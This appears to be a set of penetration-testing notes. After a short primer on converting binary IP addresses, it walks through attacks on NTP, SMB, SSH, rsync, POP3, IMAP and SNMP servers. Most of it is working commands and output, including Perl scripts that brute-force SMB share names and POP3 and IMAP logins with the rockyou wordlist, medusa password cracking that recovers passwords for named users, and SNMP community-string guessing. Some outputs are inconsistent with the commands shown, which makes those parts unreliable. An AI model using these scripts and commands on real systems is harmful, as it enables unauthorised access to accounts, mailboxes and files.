Positional Notation for IP Adresses

positional notation means that a digit represents different values depending on the position it occupies.

More specifically the value that a digit represents is the value of the digit multiplied by the power of the base or radix, represented by the position the digit occupies.

In the binary numbering system, the radix is 2. therefore each position represents increasing powers of two. In 8-bit binary numbers, the positions represent the quantities shown:

2^7 2^6 2^5 2^4 2^3 2^2 2^1 2^0
128 64  32   16    8     4     2    1

the base 2 numbering system has only two digits: 0 and 1. when a byte is interpreted as a decimal number the quantity that position represents is added to the total if the digit is a 1 and 0 is added if the digit is a 0.

a 1 in each position mean that the value for that position is added to the total.

128 64 32 16 8 4 2 1 1 1 1 1 1 1 1 1 128 + 64 + 32 + 16 + 8 + 4 + 2 + 1 = 255

the value of each position is added to determine the total value of the number.

A 0 in each position indicates that the value for that position is not added to the total.

128 64 32 16 8 4 2 1
0 0 0 0 0 0 0 0
0+0+0+0+0+0+0+0 = 0

for the conversion of a 32 bit ip address, you identify the 4 bytes or octets that make up this address. You then convert each of these four octets to decimal.

The conversion starts with the low-order bits and continues to the high-order bits.

10101100.00010000.00000100.00010100

128 64 32 16 8 4 2 1
0 0 0 1 0 1 0 0 = Binary of first octet
0+0+0+16+0+4+0+0 = 20 decimal

128 64 32 16 8 4 2 1
0 0 0 0 0 1 0 0 = Binary of second octet
0+0+0+0+0+4+0+0 = 4 decimal


128 64 32 16 8 4 2 1
0 0 0 1 0 0 0 0 = Binary of third octet
0+0+0+16+0+0+0+0 = 16 decimal

128 64 32 16 8 4 2 1
1 0 1 0 1 1 0 0 = Binary of forth octet
128+0+32+0+8+4+0+0 =  172 decimal

in the example the binary number 10101100.00010000.00000100.00010100 is converted to 172.16.4.20

Exploring NTP servers

The ntpupdate command is used for updating your system time from a remote NTP server

root@asus:~/unix% ntpdate -d 48.21.33.124
24 Sep 11:12:41 ntpdate[18621]: ntpdate 4.2.8p4@1.3265-o Fri Jul  6 20:10:56 UTC 2018 (1)
Looking for host 48.21.33.124 and service ntp
48.21.33.124 reversed to ntp.acme.com
host found : ntp.acme.com
transmit(48.21.33.124)
receive(48.21.33.124)
transmit(48.21.33.124)
receive(48.21.33.124)
transmit(48.21.33.124)
receive(48.21.33.124)
transmit(48.21.33.124)
receive(48.21.33.124)
server 48.21.33.124, port 123
stratum 2, precision -22, leap 00, trust 000
refid [48.21.33.124], delay 0.02568, dispersion 0.00002
transmitted 4, in filter 4
reference time:    e134cbc9.cb958ac6  Tue, Sep 24 2019 11:07:21.795
originate timestamp: e134cd0f.ac4c0844  Tue, Sep 24 2019 11:12:47.673
transmit timestamp:  e134cd0f.ac3db00b  Tue, Sep 24 2019 11:12:47.672
filter delay:  0.02583  0.02579  0.02568  0.02579 
         0.00000  0.00000  0.00000  0.00000 
filter offset: 0.000014 -0.00001 0.000008 -0.00003
         0.000000 0.000000 0.000000 0.000000
delay 0.02568, dispersion 0.00002
offset 0.000008

24 Sep 11:12:47 ntpdate[18621]: adjust time server 48.21.33.124 offset 0.000008 sec
root@asus:~/unix% 

Using ntptrace like traceroute

The ntptrace utility works like traceroute, reporting the links in the chain to the local NTP server.

root@asus:~/unix% ntptrace
ntp.acme.com: stratum 2, offset 0.004367, synch distance 0.045800
69.89.207.99: timed out, nothing received
***Request timed out
root@asus:~/unix% 

Using ntpq to query the remote NTP server

The ntpq utility is for diagnostic and information gathering on a specific NTP server. It has an interface similar to that of ftp and smb. Commands can be run from the command line with the '-c' option instead of working in the ntpq console.

root@asus:~/unix% ntpq
ntpq> help
ntpq commands:
:config          exit             mreadvar         reslist          
addvars          help             mrl              rl               
apeers           host             mrulist          rmvars           
associations     hostnames        mrv              rv               
authenticate     ifstats          ntpversion       saveconfig       
authinfo         iostats          opeers           showvars         
cl               kerninfo         passociations    sysinfo          
clearvars        keyid            passwd           sysstats         
clocklist        keytype          peers            timeout          
clockvar         lassociations    poll             timerstats       
config-from-file lopeers          pstats           version          
cooked           lpassociations   quit             writelist        
cv               lpeers           raw              writevar         
debug            monstats         readlist         
delay            mreadlist        readvar          
ntpq> exit
root@asus:~/unix%

We can list the peers of the NTP with the 'peers' option

root@asus:~/unix% ntpq -c peers 48.21.33.124
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
 0.us.pool.ntp.o .POOL.          16 p    -   64    0    0.000    0.000   0.000
 1.us.pool.ntp.o .POOL.          16 p    -   64    0    0.000    0.000   0.000
 2.us.pool.ntp.o .POOL.          16 p    -   64    0    0.000    0.000   0.000
 3.us.pool.ntp.o .POOL.          16 p    -   64    0    0.000    0.000   0.000
 ntp.ubuntu.com  .POOL.          16 p    -   64    0    0.000    0.000   0.000
+t1.time.gq1.yah 208.71.46.33     2 u   17   64  377   45.844   -0.416   2.455
-time.airgapped. 252.74.143.178   2 u   12   64  357   35.072    2.880  11.748
-hydra.spiderspa 142.66.101.13    2 u   12   64  377   47.258    6.998   2.777
*ntp1.wiktel.com .PPS.            1 u   19   64  377   59.587    0.386   2.643
+x.ns.gin.ntt.ne 249.224.99.213   2 u    6   64  377   30.873   -0.577   1.624
root@asus:~/unix% 

We can list the system info with the 'sysinfo' command

root@asus:~/unix% ntpq -c sysinfo 48.21.33.124
associd=0 status=0615 leap_none, sync_ntp, 1 event, clock_sync,
system peer:        ntp1.wiktel.com:123
system peer mode:   client
leap indicator:     00
stratum:            2
log2 precision:     -22
root delay:         59.587
root dispersion:    5.909
reference ID:       69.89.207.99
reference time:     e134cd50.53825fcb  Tue, Sep 24 2019 11:13:52.326
system jitter:      1.173226
clock jitter:       2.882
clock wander:       0.633
broadcast delay:    0.000
symm. auth. delay:  0.000
root@asus:~/unix% 

Theres a whole host of options in the ntpq console at your disposal to find out some interesting information from NTP servers.

Interrogating Samba Servers

Finding open smb shares with NMAP

NMAP allows us to probe for possible open smb shares using its scripting engine.

root@asus:~/unix% nmap -T4 -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 48.21.33.124

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:17 MDT
Nmap scan report for srv01.acme.com (48.21.33.124)
Host is up (0.00013s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: username
|   IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (asus server (Samba, Ubuntu))
|     Users: 2
|     Max Users: 
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: 
|     Path: C:\var\lib\samba\printers
|     Anonymous access: 
|_    Current user access: 

Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
root@asus:~/unix% 

NMAP reports two shares open using the username 'username'. next we will do it manually and see what results we get from the smbclient.

Listing remote shares

root@asus:~/pentest_notes% smbclient -L //srv01.acme.com -N
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

 Sharename       Type      Comment
 ---------       ----      -------
 homes           Disk      Home Directories
 IPC$            IPC       IPC Service (asus server (Samba, Ubuntu))
 print$          Disk      Printer Drivers
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

 Server               Comment
 ---------            -------
 ASUS                 asus server (Samba, Ubuntu)

 Workgroup            Master
 ---------            -------
 WORKGROUP            ASUS
root@asus:~/pentest_notes% 

If we try to connect to the 'homes' share we get this result.

root@asus:~/pentest_notes% smbclient //srv01.acme.com/homes -N
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
root@asus:~/pentest_notes% 

We get an error saying `BAD NETWORK NAME`, but in the comment section it says `home directories` which we will assume means users home directories. Our next step will be to try and figure out what the usernames are for the share names.

Enumerating Samba users with NMAP

In order to enumerate the possible users on the system we can issue an nmap command running the script 'smb-enum-users' and see if we get lucky.

root@asus:~/unix% nmap -sU -sS --script=smb-enum-users -p U:137,T:139 48.21.33.124

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:07 MDT
Nmap scan report for srv01.acme.com (48.21.33.124)
Host is up (0.0027s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
137/udp open  netbios-ns

Host script results:
| smb-enum-users: 
|   ASUS\clare (RID: 1001)
|     Full name:   clare chapman
|     Description: 
|     Flags:       Normal user account
|   ASUS\hayden (RID: 1002)
|     Full name:   hayden sutton
|     Description: 
|     Flags:       Normal user account
|   ASUS\jared (RID: 1003)
|     Full name:   jared beck
|     Description: 
|     Flags:       Normal user account
|   ASUS\sam (RID: 1000)
|     Full name:   sam
|     Description: 
|     Flags:       Normal user account
|   ASUS\sasha (RID: 1004)
|     Full name:   sasha kim
|     Description: 
|     Flags:       Normal user account
|   ASUS\vance (RID: 1005)
|     Full name:   vance perkins
|     Description: 
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
root@asus:~/unix%

As you can see we found the users on the remote system. our next step is to verify the shares exist.

Enumerating possible shares via brute force

If we do not know any of the names of the shares in Home Directories, we need to use a Dictonary attack to uncover some common share names against the remote machine. For this we can write a small perl script using the smbclient tool to check if a shares exists. We will use a list of common first names as our payload.

#!/usr/bin/env perl
use strict;
use warnings;
## 
## Dictonary attack against Samba server using smbclient
## try to unconver common user shares
##

my $host = "48.21.33.124";
my $filename = "common-names.txt";
open(my $fh, '<', $filename) or die $!;

while (my $word = <$fh>) {
    chomp($word);
    
    ## Try to login with a username and no password
    my $result = qx( smbclient //$host/$word -N 2>/dev/null );

    ## ACCESS_DENIED means the share exists
    ## BAD_NETW_NAME means the share does not exist
    if ($result =~ /NT_STATUS_ACCESS_DENIED/g ) {
        print "[+] Share Found @ //$host/$word\n";
        next;
    }
}

root@asus:~/pentest_notes% ./smbclient-share-brute.pl 
[+] Share Found @ //48.21.33.124/clare
[+] Share Found @ //48.21.33.124/hayden
[+] Share Found @ //48.21.33.124/jared
[+] Share Found @ //48.21.33.124/sam
[+] Share Found @ //48.21.33.124/sasha
[+] Share Found @ //48.21.33.124/vance
root@asus:~/pentest_notes% 

As you can see we found some valid shares on the remote machine we can try to connect to. But first we need to check if these shares require a password or allow us to browse anonymously. We can issue the following command to check if authentication is needed for the share in question.

root@asus:~/pentest_notes% smbclient //srv01.acme.com/hayden -U hayden -N
Enter hayden's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED
root@asus:~/pentest_notes% 

The account does not allow anonymous browsing by using a blank password

Cracking share passwords

Once we found some valid share names we can try and crack the passwords associated with the accounts to gain access. For this we will use the tool 'medusa' and the rockyou wordlist as our payload.

root@asus:~% medusa -M smbnt -v 4 -b -h srv01.acme.com -U smb-users.txt -P rockyou.txt
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: hayden Password: manager [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: jared Password: attlabs [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: sasha Password: master [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: vance Password: sonics [SUCCESS (ADMIN$ - Share Unavailable)]
root@asus:~% 

As you can see we found some valid logins we can test. Our next step is to login with the supplied creditendtials and try to browse the shares.

Browsing Shares

Now that we have valid login and passwords for some of the users on the remote machine we can now try and access the shares. SMB has a client which is similar to ftp and nfs which is easy to use.

root@asus:~/pentest_notes% smbclient //srv01.acme.com/hayden -U hayden
Enter hayden's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> 

This is what a successful login looks like. Lets now type the 'help' command to see all the commands avaiable to us in this session.

smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            dir            du             
echo           exit           get            getfacl        geteas         
hardlink       help           history        iosize         lcd            
link           lock           lowercase      ls             l              
mask           md             mget           mkdir          more           
mput           newer          notify         open           posix          
posix_encrypt  posix_open     posix_mkdir    posix_rmdir    posix_unlink   
print          prompt         put            pwd            q              
queue          quit           readlink       rd             recurse        
reget          rename         reput          rm             rmdir          
showacls       setea          setmode        scopy          stat           
symlink        tar            tarmode        timeout        translate      
unlock         volume         vuid           wdel           logon          
listconnect    showconnect    tcon           tdis           tid            
logoff         ..             !              
smb: \> 

As you can see the interface is similar to that of the ftp client, so our next step is to see if we can list the directory contents of the share.

smb: \> ls
  .                                   D        0  Wed May 15 07:45:17 2019
  ..                                  D        0  Sat Apr 27 16:58:49 2019
  .Xdefaults                          H     1600  Sat Apr 27 16:58:15 2019
  .kodi                              DH        0  Sat Apr 27 16:58:15 2019
  .profile                            H      655  Sat Apr 27 16:58:15 2019
  .bashrc                             H     3771  Sat Apr 27 16:58:15 2019
  .xscreensaver                       H     7953  Sat Apr 27 16:58:15 2019
  .bash_logout                        H      220  Sat Apr 27 16:58:15 2019
  .local                             DH        0  Sat Apr 27 16:58:15 2019
  ftp                                DR        0  Wed May 15 07:49:46 2019
  mail                                D        0  Wed May  1 09:44:03 2019
  .mozilla                           DH        0  Sat Apr 27 16:58:15 2019
  .config                            DH        0  Sat Apr 27 16:58:15 2019

  15013808 blocks of size 1024. 2057708 blocks available
smb: \> 

Lets try to get a file from the remote share.

smb: \> get .profile
getting file \.profile of size 655 as .profile (23.7 KiloBytes/sec) (average 23.7 KiloBytes/sec)
smb: \> 

Lets try and see if we have write access to the remote share

smb: \> put server.pl
putting file server.pl as \server.pl (25.2 kb/s) (average 25.2 kb/s)
smb: \> 

Changing directories is easy

smb: \> cd ftp
smb: \ftp\> ls
  .                                  DR        0  Wed May 15 07:49:46 2019
  ..                                  D        0  Mon Sep  2 14:54:37 2019
  fo                                  D        0  Wed May 15 07:49:41 2019
  files                               D        0  Wed May 15 07:49:46 2019

  15013808 blocks of size 1024. 2063700 blocks available
smb: \ftp\> 

Playing with SSH

Today we are going to show a few simple ways you can attack SSH during your pentests. There are three utilities we are going to use: ssh, scp, ssh-keygen and ssh-agent.

directories:

.rhosts 
.shosts
/etc/host.equiv
/etc/known_hosts
~/.ssh/known_hosts
/etc/ssh_host_key
/etc/sshd_config

First we need to know where to look for the files we seek. here is a list of possible directories where the ssh keys could be stored.

/etc/known_hosts
~/.ssh/known_hosts

To find out which entry is for a known hostname in known_hosts:

ssh-keygen -H -F

sam@asus:~/.ssh% ssh-keygen -H -F 192.168.0.114
|1|aP8X7rqELFIt1E+CCZAydtyEk6Y=|10zWG8d41M4chq+dWCeYl478K44= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGYiocw4QQHtt3o3fWtQukbtNSEdJ/hVqdZloOEDr/sPfPTMtuMrZrqZUJPcFCNKq8fruQuNz69TuQvtPtKpPoU=
sam@asus:~/.ssh% 

sam@asus:~/.ssh% ssh-keygen -H -F 192.168.0.133
|1|YZz3ABZMj6+Jfjsr0EkD69NAJ24=|xereMKxRccSiiwD/H6XFjwJIpiY= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBu6FvLNdLBgBK65PUi5cvDNWGid18FRubq2GtAnzGi47AO8TgotV9oEHVoVRJxZrtbEu0Ub3ueoBkWGsC46XLE=
sam@asus:~/.ssh% 

ssh-keyscan is a utility for gathering the public ssh host keys of a number of hosts.

sam@asus:~/.ssh% ls -la /usr/bin/ssh-keyscan 
-rwxr-xr-x 1 root root 411888 Nov  5 04:26 /usr/bin/ssh-keyscan
sam@asus:~/.ssh% 

we got exec perm's so lets run a simple scan on the hosts file to see what we can find.

sam@asus:~/.ssh% ssh-keyscan -t rsa,dsa -f known_hosts
getaddrinfo |1|aP8X7rqELFIt1E+CCZAydtyEk6Y=|10zWG8d41M4chq+dWCeYl478K44=: Name or service not known
getaddrinfo |1|aP8X7rqELFIt1E+CCZAydtyEk6Y=|10zWG8d41M4chq+dWCeYl478K44=: Name or service not known
getaddrinfo |1|8h12/1DU2Hlo17sZMNgIah3GPIE=|Fvd464UQOihOv/HpFvnLeLNYU8E=: Name or service not known
getaddrinfo |1|8h12/1DU2Hlo17sZMNgIah3GPIE=|Fvd464UQOihOv/HpFvnLeLNYU8E=: Name or service not known
getaddrinfo |1|YZz3ABZMj6+Jfjsr0EkD69NAJ24=|xereMKxRccSiiwD/H6XFjwJIpiY=: Name or service not known
getaddrinfo |1|YZz3ABZMj6+Jfjsr0EkD69NAJ24=|xereMKxRccSiiwD/H6XFjwJIpiY=: Name or service not known
sam@asus:~/.ssh% 

Enumerating ssh known_hosts via /etc/hosts

we can search the /etc/host file for other possible leads.

sam@asus:~/.ssh% ls -la /etc/hosts;cat /etc/hosts
-rw-r--r-- 1 root root 251 Jan  7 15:23 /etc/hosts
127.0.0.1 localhost
127.0.1.1 asus
192.168.0.114 debian9.acme.com


# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
sam@asus:~/.ssh% 

lets extract our ipv4 addresses from /etc/hosts and redirect the output to a file

root@asus:~/pentest_notes% cat /etc/hosts | awk 'BEGIN{FS="\t"} {print $2}' | sed -e '/^$/d' -e '/localhost/d'
asus
debian9.acme.com
root@asus:~/pentest_notes% 

once we have an enumeration list we can write a shell script using `ssh-keygen` to verify the key with a specific host in our list.

#!/usr/bin/env bash

hosts=( debian.acme.com taurus.acme.com nemo.acme.com 192.168.0.114 firewall.acme.com 192.168.0.133 )

for host in "${hosts[@]}"
do
    result=`ssh-keygen -H -F ${host} | awk '/|1|/ {print 1}'`
    if [[ ${result} == "1" ]]
    then
        echo "${hosts} found for key in known_hosts"
    fi
done

root@asus:~/pentest_notes% ./ssh.sh 
debian.acme.com found for key in known_hosts
root@asus:~/pentest_notes%

As you can see we got one entry: `debian.acme.com`. Now we have a list of other hosts on the network we have shell access to for further testing.

Get and display hosts public key

If you have not yet connected to ssh.example.com, run ssh-keyscan ssh.example.com to retrieve it and ssh-keygen -F ssh.example.com to display it. Ideally, you would double-check with the owner of ssh.example.com that it is indeed the server’s public key and not the key of a spoofed instance of ssh.example.com.

Get hosts public key

sam@asus:~% ssh-keyscan 192.168.0.25
# 192.168.0.25:22 SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u4
192.168.0.25 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKyD1nuUcW8olAYwHDIwBT57W1/dm6uvsis598HePVl8
sam@asus:~% 

once we get the hosts public key, we can display it like so:

Display hosts public key

sam@asus:~% ssh-keygen -F 192.168.0.25
# Host 192.168.0.25 found: line 5 
|1|AgJUJ1s82ZKx2XJVCWbtbpdUwrA=|1uhVzOOjW5CArQIXOwego4n7ux0= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLucsnK25OOWpAyH4ki4Ome576pVuqxjs39KAcxIuWXbNTboPy3Y+jO8nuxUfLCsBDXGDp0xHdGuhO5g28Vzfkg=
sam@asus:~% 

Enumerating RSYNC servers with examples

Listing remote files and directories

root@ubuntu:~# rsync -rdt rsync://148.43.33.23:873
code            backup
root@ubuntu:~# 

root@ubuntu:~# rsync -rdt rsync://148.43.33.23:873/code
drwxr-xr-x          4,096 2019/08/26 11:57:35 .
-rw-rw-r--         10,240 2019/08/26 11:57:35 archive.tar
-rw-rw-r--        151,155 2019/08/04 16:45:38 fgets.png
-rw-rw-r--        151,483 2019/08/04 16:43:16 file-get-contents.png
-rw-rw-r--        150,683 2019/08/04 16:28:27 fread.png
-rw-r--r--          4,304 2019/08/26 11:45:23 fuzz.php
-rw-rw-r--         14,514 2019/08/17 12:49:43 http-auth.png
-rw-rw-r--        150,810 2019/08/04 16:43:52 include.png
-rw-rw-r--        388,241 2019/08/19 13:12:31 lfi-rce-perl.png
-rw-rw-r--        406,990 2019/08/17 20:18:15 lfi-rce.png
-rw-rw-r--        150,723 2019/08/04 16:44:51 readfile.png
-rw-rw-r--        344,161 2019/08/06 15:56:35 recipes-1.0.zip
drwxrwxr-x          4,096 2019/08/17 20:03:33 logs
-rwxrwxr-x         65,863 2019/08/17 20:01:11 logs/access.log
root@ubuntu:~# 

Copy a file to a server

rsync -zvh [local file] [user]@[host]:/path/to/remote/dir

root@ubuntu:~# rsync -zvh archive.tar data@148.43.33.23:/home/data/backup/
data@148.43.33.23's password: 
archive.tar

sent 252 bytes  received 35 bytes  52.18 bytes/sec
total size is 10.24K  speedup is 35.68
root@ubuntu:~# 

Copy files from a server

rsync -zvh [user]@[host]:/path/to/remote/file [local file]

root@ubuntu:~# rsync -zvh data@148.43.33.23:/home/data/backup/fuzz.php f.php
data@148.43.33.23's password: 
fuzz.php

sent 43 bytes  received 1.73K bytes  236.40 bytes/sec
total size is 4.30K  speedup is 2.43
root@ubuntu:~# 

Copy a directory to a server

rsync -avz [local dir] [user]@[host]:/path/to/remote/dir

root@ubuntu:~# rsync -avz Pictures/ data@148.43.33.23:/home/data/backup/
data@148.43.33.23's password: 
sending incremental file list
./
fgets.png
file-get-contents.png
fread.png
http-auth.png
include.png
lfi-rce-perl.png
lfi-rce.png
readfile.png

sent 1,503,262 bytes  received 171 bytes  273,351.45 bytes/sec
total size is 1,564,599  speedup is 1.04
root@ubuntu:~# 

Copy directories from a server

rsync -avz [user]@[host]:/path/to/remote/dir [local dir]

root@ubuntu:~# rsync -azvh data@148.43.33.23:/home/data/backup/logs logs
data@148.43.33.23's password: 
receiving incremental file list
created directory logs
logs/
logs/access.log

sent 47 bytes  received 3.02K bytes  245.60 bytes/sec
total size is 65.86K  speedup is 21.45
root@ubuntu:~# 

Exploring POP3 Servers

Scanning the remote host

We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server.

root@asus:~/unix% nmap -p 110 -sC -sV 148.32.42.5

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-23 14:33 MDT
Nmap scan report for mail.acme.com (148.32.42.5)
Host is up (0.00018s latency).
PORT    STATE SERVICE VERSION
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP AUTH-RESP-CODE USER CAPA UIDL SASL(PLAIN) RESP-CODES

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds
root@asus:~/unix% 

Once we verify that the remote host is running the pop3 service we can move on to connecting to the POP3 service. For this we can use telnet.

root@asus:~/unix% telnet 148.32.42.5 110
Trying 148.32.42.5...
Connected to 148.32.42.5.
Escape character is '^]'.
+OK Dovecot ready.
QUIT
+OK Logging out
Connection closed by foreign host.
root@asus:~/unix%

We were able to sucessfully connect to the remote host. We also get the POP3 Banner which is 'Dovecot' telling us the server software version.

Finding valid POP3 logins

Our next step is to use a brute force attack against the POP3 server to find valid user/pass combinations to login to the server with. for this we can write a small perl script which will brute force a list of common first names and the rockyou wordlist for the password side.

#!/usr/bin/env perl
use strict;
use warnings;
use Net::POP3;

my $pop3 = Net::POP3->new('mail.acme.com');

my @userlist = file2array('common-names.txt');
my @passlist = file2array('rockyou.txt');

print "[*] Searching for valid POP3 logins...\n";

foreach my $user (@userlist) {
    foreach my $pass (@passlist) {        
        if ($pop3->login($user,$pass)) {
            print "[+] Found Login: $user:$pass\n";            
        }
    }
    sleep 1;
}
$pop3->quit;

sub file2array {
    my $file = shift;
    my @array;

    open(my $fh, '<', $file) or die $!;

    while (<$fh>) {
        chomp($_);
        push(@array, $_);
    }

    close($fh) or die $!;
    
    return @array;    
}

If we run the script...

root@asus:~/unix% perl pop3.pl
[*] Searching for valid POP3 logins...
[+] Found Login: clare:jessica
[+] Found Login: vance:654321
[+] Found Login: sasha:michael
[+] Found Login: hayden:qwerty
root@asus:~/unix%

Logging in to the POP3 server

Now that we have some valid POP3 logins, we can move on to connecting to the server and logging in with our user/pass combos and browse the inbox of the user.

root@asus:~% telnet 148.32.42.5 110
Trying 148.32.42.5...
Connected to 148.32.42.5.
Escape character is '^]'.
+OK Dovecot ready.
USER clare
+OK
PASS jessica
+OK Logged in.
LIST
+OK 0 messages:
.
QUIT
+OK Logging out.
Connection closed by foreign host.
root@asus:~%

Exploring IMAP Servers

Scanning the Remote Host

We can use NMAP to scan the remote IMAP server and run enumeration scripts agaisnt it to see what all the server is capable of.

root@asus:~% nmap -p 143 -sC 148.32.42.5

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-23 12:39 MDT
Nmap scan report for mail.acme.com (148.32.42.5)
Host is up (0.00013s latency).
PORT    STATE SERVICE
143/tcp open  imap
|_imap-capabilities: AUTH=PLAINA0001 SASL-IR IDLE more IMAP4rev1 have ID 
capabilities OK ENABLE Pre-login post-login LITERAL+ listed LOGIN-REFERRALS

Nmap done: 1 IP address (1 host up) scanned in 2.21 seconds
root@asus:~%

Finding logins for valid IMAP users

We got a valid username from another pentest against another service. the user name is 'clare' but we do not know what her password is. We can write a small perl script to enumerate valid logins on the remote IMAP host using Net::IMAP perl module.

#!/usr/bin/env perl
use strict;
use warnings;
use Net::IMAP::Simple;

my $user     = "clare";
my $wordlist = "rockyou.txt";

open(my $fh, '<', $wordlist) or die $!;

print "[*] Searching for valid IMAP logins...\n";

my $imap = Net::IMAP::Simple->new("mail.acme.com") or die "$Net::IMAP::Simple::errstr\n";

while(my $pass = <$fh>) {
    chomp($pass);
    if ($imap->login($user,$pass)) {
        print "[+] OK LOGIN | $user:$pass\n";
    }
}
$imap->quit();

If we run the script...

root@asus:~% perl imap.pl 
[*] Searching for valid IMAP logins...
[+] OK LOGIN | clare:jessica
root@asus:~% 

As you can see we got some valid logins for the IMAP server. Our next step is to try and explore the inboxes we just got access to.

Logging in to the IMAP server

We can telnet in to the remote IMAP server with our valid user credentials to try and browse the inbox of the account

root@asus:~% telnet 148.32.42.5 143
Trying 148.32.42.5...
Connected to 148.32.42.5.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=PLAIN] Dovecot ready.
ME -> 1 LOGIN clare jessica
1 OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SPECIAL-USE] Logged in
ME -> 2 LIST "" "*"
* LIST (\HasNoChildren) "/" INBOX
2 OK List completed (0.000 + 0.000 secs).
ME -> 3 EXAMINE INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS ()] Read-only mailbox.
* 0 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1569265821] UIDs valid
* OK [UIDNEXT 1] Predicted next UID
* OK [HIGHESTMODSEQ 1] Highest
3 OK [READ-ONLY] Examine completed (0.000 + 0.000 secs).
ME -> 4 LOGOUT
* BYE Logging out
4 OK Logout completed.
Connection closed by foreign host.
root@asus:~% 

Exploring SNMP servers

Find SNMP Servers With NMAP

Here we will scan a class C ip range for possible SNMP servers on the local network.

sam@asus:~% nmap -sU -p 161 148.32.42.0/24
Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-23 11:42 MDT

Nmap scan report for 148.32.42.1
Host is up (0.00046s latency).
PORT    STATE SERVICE
161/udp closed  snmp

Nmap scan report for 148.32.42.2
Host is up (0.00030s latency).
PORT    STATE SERVICE
161/udp closed  snmp

Nmap scan report for 148.32.42.3
Host is up (0.00026s latency).
PORT    STATE SERVICE
161/udp closed  snmp

Nmap scan report for 148.32.42.4
Host is up (0.00025s latency).
PORT    STATE SERVICE
161/udp closed  snmp
...
Nmap done: 256 IP addresses (1 hosts up) scanned in 16.75 seconds
sam@asus:~%

After we got a list of servers, our next task is to try and guess possible community strings for the remote SNMP hosts and check for read/write access on the configuration.

Brute force SNMP Community Strings with onesixtyone

Here we can brute force the SNMP service looking for different community strings we can use to connect with and possibly carry out read/write operations on the remote host configuration. The program we will use is called 'onesixtyone' and can be downloaded from github.

sam@asus:~/onesixtyone% ./onesixtyone -c dict.txt snmp.acme.com
Scanning 1 hosts, 51 communities
148.32.42.5 [public] Linux asus 4.9.4-galliumos-braswell #1 SMP PREEMPT galliumos2 Thu Feb 23 01:58:04 UTC 2017 x86_64
sam@asus:~/onesixtyone% 

We found one community string, the default 'public' community string.

Dumping SNMP Data with SNMPWalk

After we have found some valid community strings our next task is to query the SNMP server with our valid community strings and try to dump the information associated with the current community string. Here we will use the 'SNMPWalk' tool to carry out the SNMP queries.

sam@asus:~% snmpwalk -c public -v1 snmp.acme.com | less
iso.3.6.1.2.1.1.1.0 = STRING: "Linux asus 4.9.4-galliumos-braswell #1 SMP PREEMPT galliumos2 Thu Feb 23 01:58:04 UTC 2017 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (17062223) 1 day, 23:23:42.23
iso.3.6.1.2.1.1.4.0 = STRING: "Me "
iso.3.6.1.2.1.1.5.0 = STRING: "asus"
iso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (20) 0:00:00.20
